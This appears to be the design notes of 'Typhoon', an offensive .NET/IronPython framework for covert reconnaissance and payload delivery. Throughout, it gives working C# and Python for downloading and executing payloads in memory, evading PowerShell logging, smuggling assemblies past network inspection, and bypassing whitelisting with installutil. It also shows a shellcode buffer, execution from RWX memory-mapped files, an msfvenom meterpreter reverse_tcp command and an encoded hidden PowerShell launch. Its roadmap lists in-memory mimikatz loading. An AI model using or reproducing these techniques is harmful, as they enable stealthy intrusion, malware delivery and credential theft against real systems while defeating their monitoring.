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Goals. What are we solving

  • Ability to recon under the radar for longer (primary)
  • Ability to better deliver code and payloads over .Net facilities across monitored systems and networks
  • Ability to quickly retool. Building blocks vs. fingerprintable products.

Managed (compiled) - CSaw

  • Ability to dynamically compile CSharp code
  • Ability to load assemblies in memory and removing disk artifacts
  • Ability to compile and run in separate invocations
  • Ability to dynamically load an assembly and invoke and class in it
  • Ability to REPL CSharp for quick gains
  • Ability to use CSharp to avoid PS monitoring
  • Ability to increase effectiveness of payload delivery over managed code (a bonus)
  • AppDomain assist
  • Interop to native unmanaged

Managed (dynamic) - DLRium

  • Ability to leverage DLR to avoid Powershell logging while preserving scriptability (in cmparison to CS)
  • Ability to leverage Python expressiveness and dynamic typing while still having ability to transparently engage .Net framework mechanisms
  • Ability to compile Python to exe or dll via DLR
  • Ability to drop down to .Net from Python or to Python from .Net (stealth, confusing analysis)
  • Load from Bytes
  • Interop to native unmanaged with load/unload

Challenges. Technical and DFIR

  • What artifacts does dynamic compilation produce. How can we minimize it.
  • What facilities in .Net are available to increase stealth of both payload delivery and recon
  • PyDLR != CPython
    • Stdlib modules minus (c, size, format). Size, format -> zip loading

Example: Invoking Iron Python from IronPython over .Net Assembly w/variables (-> stealth)

import clr

from IronPython.Hosting import Python
from Microsoft.Scripting import SourceCodeKind

code = "print string"
values = {'string': 'Hello World'}

engine = Python.CreateEngine()
source = engine.CreateScriptSourceFromString(code, SourceCodeKind.Statements)
mod = engine.CreateScope()

for name, value in values.items():
    setattr(mod, name, value)


CSaw: List available managed compliers on the system (CSX format)

We would like to introduce a way to quickly REPL/prototype code

directive> using System;
directive> using System.IO;
directive> using System.Text;
directive> using System.CodeDom;
directive> using System.Diagnostics;
directive> using System.CodeDom.Compiler;
directive> END
code> foreach (System.CodeDom.Compiler.CompilerInfo ci in
code> System.CodeDom.Compiler.CodeDomProvider.GetAllCompilerInfo())
code> {
code>   foreach (string language in ci.GetLanguages())
code>   System.Console.Write("{0} ", language);
code>   System.Console.WriteLine();
code> }
code> END
Perforing dynamic compile and execution.

--- Result ---
c# cs csharp
vb vbs visualbasic vbscript
js jscript javascript
c++ mc cpp

Delivery: Load PY over network, from CS code

Example: Direct PYDLR invoke

WebClient wc = new WebClient();
Console.WriteLine("Getting Code payloads ...");
byte[] dllzip = wc.DownloadData(@"");

Stream zipdata = new MemoryStream(scriptzip);
Stream unzippedDataStream;
ZipArchive archive = new ZipArchive(zipdata, ZipArchiveMode.Read);

foreach (ZipArchiveEntry entry in archive.Entries)

    if (entry.FullName == @"")
        Console.WriteLine("Unzipped File: {0}", entry.Name);
        unzippedDataStream = entry.Open();

        StreamReader reader = new StreamReader(unzippedDataStream);
        string codeText = reader.ReadToEnd();
        pythonScript = pengine.CreateScriptSourceFromString(codeText);
        Console.WriteLine("Executing Source >>>  {0} <<< ...", 
                        codeText.Substring(0, (codeText.Length >= 80) ? 79 : codeText.Length));


Stage code in memory mapped file (e.g. for further compilation)

  • We save in memory resident store
  • We do not store on disk. Some defenses miss that. Some will flag. We can decouple payload storage and invocation on demand.
Dictionary<String, MemoryMappedFile> mmfRepo = new Dictionary<String, MemoryMappedFile>();

// Load network bytes into memory stream and unzip in memory.
Stream dllzipdata = new MemoryStream(dllzip);
ZipArchive dllarchive = new ZipArchive(dllzipdata, ZipArchiveMode.Read);

Stream unzippedCSDataStream;
MemoryMappedFile mmf;
foreach (ZipArchiveEntry entry in dllarchive.Entries)
    if (entry.Name == @"payload.cs")
        Console.WriteLine("Unzipped CSharp: {0}", entry.Name);
        unzippedCSDataStream = entry.Open();
        // Prepare Memory Map for file
        mmf = MemoryMappedFile.CreateNew(entry.Name, entry.Length);

        // Save mmf
        mmfRepo.Add(entry.Name, mmf);

        StreamReader reader = new StreamReader(unzippedCSDataStream);
        string codeText = reader.ReadToEnd();

        byte[] Buffer = ASCIIEncoding.ASCII.GetBytes(codeText);
        using (MemoryMappedViewStream stream = mmf.CreateViewStream())
            BinaryWriter writer = new BinaryWriter(stream);

Methods of bringing assemblies across inspected network:

  1. Compile .cs code and have DLLs as embedded resources in your assemblies /csc /resource:Ironpython.dll

  2. Bring modularized assemblies as netmodules. A Netmodule is an assembly without a manifest. Not identifiable or scannable as not executable. Complie to a product onsite.

csc -target:module payload.cs csc /netmodule:module

Also, see Examples\ 3. Possibly use .Net Download Cache facilities

gacutul /ldl

(Location where it downloads): C:\Users\dimas\AppData\Local\assembly\dl3\

You can modify. yourexe.exe.config file and point to remote DLL to fetch.


 <?xml version="1.0" encoding="utf-8" ?>
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
          culture="" />
        <codeBase version="" href="" />

DLRium: Example: compile netmodules in code, and then assemble them, in code


Attempt Logging evasion while maintaining productivity


  • cPython: Not logged but you need cPython on target machine (blacklisted)
import urllib2
content = urllib2.urlopen("").read()
  • CSharp: Not logged, but a direct compilation requires invocation of csc.exe executable from potentially logged shell. Powershell records you executing csc.exe or msbuild.exe.
using System.Net
var content = string.Empty;
using (var webClient = new WebClient())
    content = webClient.DownloadString("");
  • Powershell 5: Logged
$webClient = New-Object System.Net.WebClient
$content = $webClient.DownloadString("")
Out-Host $content 


  1. Dymamic CS compilation and invocation

Not logged, full .Net, as long as you can run an unsigned executable or invoke with already whitelisted: installutil: %windir%\Microsoft.NET\Framework\v2.0.50727\installutil /logtoconsole=false /logfile= /u [your assembly .dll here]

  1. Invocation via DLR Python DLR. Not logged, dynamic, some batteries included. ^^ rules apply

CSaw: CSX script

  • Some contract to code. Rudmintary (no classes no functions), fast and dirty prototype. Recon. (We will do better with extensions later).
using System; 
using System.Net;
WebClient client = new WebClient();
String address = @"";
string reply = client.DownloadString (address);
Console.WriteLine("{0} ... ", reply.Substring(0, 80));

DLRium PyDLR script

  • Full Python flow and branching, as long as you stay sequential.
from System.Net import WebClient
content = WebClient().DownloadString("")
print content

Evasion with productivity. .Net DLR + Python from CSharp

PyDLR introspection via reflection. Even more stealth?

  1. Python file which contains what we want to execute: Trivial example of adding two numbers
# The class you want to access externally.
class DoCalculations():

 # A method within the class that adds two numbers.
 def DoAdd(self, First, Second):
    # Provide a result.
    return First + Second

# A test suite in IronPython.
def __test__():

 # Create the object.
 MyCalc = DoCalculations()

 # Perform the test.
 print MyCalc.DoAdd(5, 10)
  1. Invoke PyDLR class from CSharp

a. Normal invoke.

// Obtain the runtime.
var IPY = Python.CreateRuntime();
// Create a dynamic object containing the script.
dynamic TestPy = IPY.UseFile(“”);
// Execute the __test__() method.

b. Reflective IronPython Invoke

// Introspect iPython module:
// Create an object for performing tasks with the script.
ObjectOperations Ops = Eng.CreateOperations();
// Create the class object.
// Obtain the class object.
Object CalcClass = Scope.GetVariable(“DoCalculations”);
// Create an instance of the class.
Object CalcObj = Ops.Invoke(CalcClass);
// Get the method you want to use from the class instance.
Object AddMe = Ops.GetMember(CalcObj, “DoAdd”);
// Perform the add.
Int32 Result = (Int32)Ops.Invoke(AddMe, 5, 10);

IronPython without STDLib included

('unicodedata', '_ast', 'imp', 'future_builtins', 'clr', 'exceptions', '__builtin__', 'sys', 'array', 'binascii', 'bz2', 'cmath', 'msvcrt', 'mmap', 'signal', 'winsound', 'zipimport', 'zlib', '_bisect', '_codecs', '_collections', 'copy_reg', 'cPickle', 'cStringIO', 'datetime', 'errno', 'gc', 'itertools', '_csv', '_io', '_locale', 'marshal', 'math', '_md5', 'nt', 'operator', 're', 'select', '_sha', '_sha256', '_sha512',/ 'socket', '_ctypes', '_ctypes_test', '_heapq', '_struct', 'thread', 'time', 'xxsubtype', '_functools', '_random', '_sre', '_ssl', '_subprocess', '_warnings', '_weakref', '_winreg')

Load Ironpython Stdlib from zip. Zip can also be brought in as renamed docx

  • Benefits of StdLib you get a lot more python modules. Example: import traceback, os
  • Size increases.
  • On-disk drop.
  • Much available from .Net but can mix and match to confuse defenses more
import clr, sys
import  traceback, urllib
  opener = urllib.FancyURLopener({})
  f ="")
except Exception as e:
  print e

Note on Assemblies: .Net does not require them to be named DLL (.NEt loader does not care about name, only embeded manifest)

import clr clr.AddReferenceToFileAndPath(r"C:\Users\dimas\AppData\Local\Temp\tmp14A5.tmp")

.Net is .Net . DLR is a .Net technique. Can expand easily into Win Forms, etc.

import clr; 
clr.AddReference("System.Windows.Forms") ;
from System.Windows.Forms import *; 
clr.AddReference("System.Drawing") ; 
clr.AddReference("System.Windows.Forms") ;
f = Form(); 

from System.Windows.Forms import MessageBox
MessageBox.Show("Hello World")

from System.Threading import Thread, ThreadStart
def f():
   print "Thread Finished"


Compile PyDLR into dll and load it


def hello():
    print "Hello"

Compile and load:

import clr
clr.CompileModules("test.dll", "")
import test
print test.hello()

Compile PyDLR to Exe.

  • In fact, compile ron pyton interpreter to exe via reflection:
.\Typhoon.exe  -mode=exec -type=py -method=sfile -resource=..\..\Examples\Extensions\ -targs="/target:exe /platform:x64 /" 

Run time dependencies still need to be accounted for. Depends how you look at it. Standalone payload functionality wtih dependent runtime libraries, vs. frozen fat binaries.

copy ..\..\Resources\IronPython.dll .
copy ..\..\Resources\Microsoft.Dynamic.dll .
copy ..\..\Resources\Microsoft.Scripting.dll .

Multiline PyDLR REPL is possible. Even easier than CSSharp:

import clr
from System.Windows.Forms import MessageBox
MessageBox.Show("Hello World")

Interop Section

  • Interop is interface with Native unmanaged code.
  • what .Net cannot do unamanged can

CSharp via DLLImport

using System
using System.Runtime.InteropServices;

[DllImport("user32.dll", SetLastError = true)]
static extern IntPtr FindWindowEx(IntPtr hwndParent, IntPtr hwndChildAfter, string lpszClass, string lpszWindow);
    IntPtr thisW = FindWindowEx(IntPtr.Zero, IntPtr.Zero, null, "Downloads");

[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern bool SetWindowText(IntPtr hwnd, String lpString);
    SetWindowText(thisW, "Hello");

Unamanged code via CodeDom from PyDLR:

See Examples\

Unmanaged code via Ctypes (needs IP STDLib)

import ctypes
buffer = ctypes.create_string_buffer(100)
ctypes.windll.kernel32.GetWindowsDirectoryA(buffer, len(buffer))
print buffer.value

See Examples\ for more

Dynamic WinaPi invoke cs script with shim assist

  • Abstracts complexity
  • Does not lock resources. (.Net 2.x-4.x does not allow unloading assemblies, unless in appdoamin (CSaw does it) / DLium does it too)
  • .Net load via bytes? PyDLR can Note: .Net Core is not tested.
using System; 
using DynamicLoad;
dynamic user32 = DynLibUtil.LoadWinapiPInvoke("user32");
user32.MessageBox(0, "Hello World", "P/Invoke Sample", 0);

See Capture_via_compile for full example of interop



  • void pointer to memory mapped file
  • via virtualalloc

a. via PyDLR

    import socket
except Exception as e:
    print e

from System.Threading import Thread, ThreadStart

def scode():
  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sock.connect(("", 8080))

  buf =  ""
  buf += "\xdb\xc3\xbd\x9c\xec\x7c\x70\xd9\x74\x24\xf4\x5a\x31"
  buf += "\xc9\xb1\x89\x31\x6a\x17\x03\x6a\x17\x83\x76\x10\x9e"
  buf += "\x85\x5d\x36\xe2\xbc\xbe\xe4\x03\x98\x34\xd3\xcf\x45"
  buf += "\x41\x7a\xf3\xc9\x40\x60\x8d\x72\x24\x0c\x83\xf8\x1d"
  buf += "\x7a\x89\x79\xe9\xe6\x4d\x96\xd6\xe8\x22\x02\x21\xcd"
  buf += "\x18\x2c\x21\x6d\x85\xa1\xa0\xcb\x88\xfd\x01\x0d\x7b"
  buf += "\xdc\x3a\x3f\x58\xec\x00\x16\x38\x52\x32\xb2\x79\xb4"
  buf += "\x39\x23\x2f\xae\xbe\x29\xd3\x63\xb1\xc6\xb5\xf9"



b. via CSharp

see C:\Users\dimas\Documents\Projects\MET\Typhoon\Examples\ShellCode.cs

 mmf = MemoryMappedFile.CreateNew("__shellcode",
                            shellcode.Length, MemoryMappedFileAccess.ReadWriteExecute);

// Create a memory mapped view accessor with read/write/execute permissions..
mmva = mmf.CreateViewAccessor(0, shellcode.Length,

// Write the shellcode to the MMF..
mmva.WriteArray(0, shellcode, 0, shellcode.Length);

// Obtain a pointer to our MMF..
var pointer = (byte*)0;
mmva.SafeMemoryMappedViewHandle.AcquirePointer(ref pointer);

// Create a function delegate to the shellcode in our MMF..
var func = (GetPebDelegate)Marshal.GetDelegateForFunctionPointer(new IntPtr(pointer),

// Invoke the shellcode..
return func();
                private WorkThreadFunction(ShellCode){
               //msfvenom  -p windows/meterpreter/reverse_tcp --platform windows ReverseConnectRetries=255   
                            PrependMigrate=true  LHOST= LPORT=1337 -e x86/shikata_ga_nai -i 3 -f  csharp 
                String ShellCode = @"
                    0xb0,0x69,0xed,0x38,0xfb,0x8e,0x25,0x5a,0x04 ....

                Thread thread = new Thread(new ThreadStart(WorkThreadFunction));
                thread.IsBackground = true;

If you want powershell interface you could do:

# Process start 
    from System.Diagnostics import Process
    # As an option
    Process.Start('powershell.exe', '')
except Exception as e:

# More controlled invocation
p = Process()
p.StartInfo.UseShellExecute = False
p.StartInfo.RedirectStandardOutput = True
p.StartInfo.FileName = 'pOwersHell.exE'
p.StartInfo.Arguments = " -nop -encodedcommand JABzAD0ATgBlAHcALQBPAGI ..... "

Develop with PyDLR: Casting, Typing, Lambdas, etc

from System.Collections.Generic import IEnumerable, List
list = List[int]([1, 2, 3])
import clr
from System.Linq import Enumerable
Enumerable.Any[int](list, lambda x : x < 2)

Download of file over TLS, Unzip into memory

zipdata = MemoryStream(zip)

archive = ZipArchive(zipdata, ZipArchiveMode.Read)
<System.IO.Compression.ZipArchive object at 0x000000000000002B [System.IO.Compression.ZipArchive]>

CSaw: Extensions.

  • Dynamic class building with disposable interface
  • Contract:
        public void PreLaunch() {}
        public void RunCode(){}
        public void PostLaunch() {}


  • reflection/emit examples: WmiQuery.cs

  • CodeDom

  • csc compilation (DFIR perspective):

                  // In-memory generation is a misnomer. There are some artifacts left on disk, 
                  // in-memory really means `in temp`
                  // Example of artifacts for in-memory compilation and preservation of temp files:
                   * λ dir "C:\Users\dimas\AppData\Local\Temp\tmp*"
                       Volume in drive C has no label.
                       Volume Serial Number is ECBC-2429
                      Directory of C:\Users\dimas\AppData\Local\Temp
                      08/12/2017  10:31 PM                 0 tmp16A6.tmp
                      08/12/2017  10:30 PM                 0 tmpF581.tmp
                      08/12/2017  10:32 PM             2,080 1vvp5flt.0.cs
                      If temp files are preserved we see:
                      08/12/2017  10:32 PM               778 1vvp5flt.cmdline
                      08/12/2017  10:32 PM                 0 1vvp5flt.err
                      08/12/2017  10:32 PM             1,353 1vvp5flt.out
                      08/12/2017  10:32 PM                 0 1vvp5flt.tmp
                  parameters.GenerateInMemory = true
                  // options for the compiler. We choose `unsafe` because we want a raw pointer to the buffer containing shellcode
                  // parameters.CompilerOptions += "/optimize+ ";
                  // parameters.CompilerOptions += "/target:module"; 
                  parameters.CompilerOptions += "/nologo /unsafe"
                  // This call to .CompiledAssembly loads the newly compile assembly into memory. 
                  // Now we can release locks on the assembly file, and delete it after we get the type to run
                  // Deletion of the assembly file is possible because we are executing in a new AppDomain. 
                  // Normally we cannot delete an asembly if it's being used/loadded in the same AppDomain. It is locked by the process.
                  var type = cr.CompiledAssembly.GetType("DynamicShellCode.DynamicShellCodeCompile")


check releases 3.6, core and platforms C:\Users\dimas\Downloads\IronPython-2.7.7-win\IronPython-2.7.7\Platforms


  • Alt Streams delivery
  • csc compilation to AppTemp
  • app.exe.config download of content to Temp/dl3
  • loading python stdlib from PKzip (docx)
  • loading .net modules
  • memory mapped registry of source compile (py and cs)
  • python exploit scripts compat (msf payloads)
  • loading and executing exes from memory (mimikatz)
  • side loading pip packages in zips.
  • Win32 API call proxy (.cs or .py)
  1. Add resourced in resource editor
  2. Build action: Embeedded resource


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